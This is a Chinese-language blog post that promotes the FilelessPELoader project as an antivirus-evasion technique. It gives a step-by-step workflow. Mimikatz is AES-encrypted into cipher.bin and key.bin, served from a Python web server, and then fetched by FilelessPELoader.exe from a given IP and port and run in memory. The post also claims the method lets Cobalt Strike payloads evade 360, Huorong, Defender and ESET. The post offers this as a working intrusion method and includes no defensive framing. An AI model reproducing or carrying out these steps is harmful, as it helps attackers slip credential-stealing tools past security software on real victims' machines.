免杀技术 – FilelessPELoader 免杀加载

FilelessPELoader 免杀加载

分享一个好用的 PE 远程加载项目

https://github.com/TheD1rkMtr/FilelessPELoader

远程内存加载,免杀大部分的杀软

1、首先安装相关 python 库

pip install pycryptodome

2、使用 aes.py 生成两个 bin 文件,分别为 cipher.bin 和 key.bin

python aes.py mimikatz.exe

3、使用 python 开启 web 服务,

python -m http.server 80

python -m SimpleHTTPServer 8080

4、使用编译好的程序进行远程加载

免杀技术 - FilelessPELoader 免杀加载
FilelessPELoader.exe 192.168.159.3 80 cipher.bin key.bin
[+] Usage: FilelessPELoader.exe <Host> <Port> <Cipher> <Key>
免杀技术 - FilelessPELoader 免杀加载

同样可以免杀 cs 上线,测试可以免杀 360、火绒、def、eset

免杀技术 - FilelessPELoader 免杀加载
免杀技术 - FilelessPELoader 免杀加载
免杀技术 - FilelessPELoader 免杀加载
© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容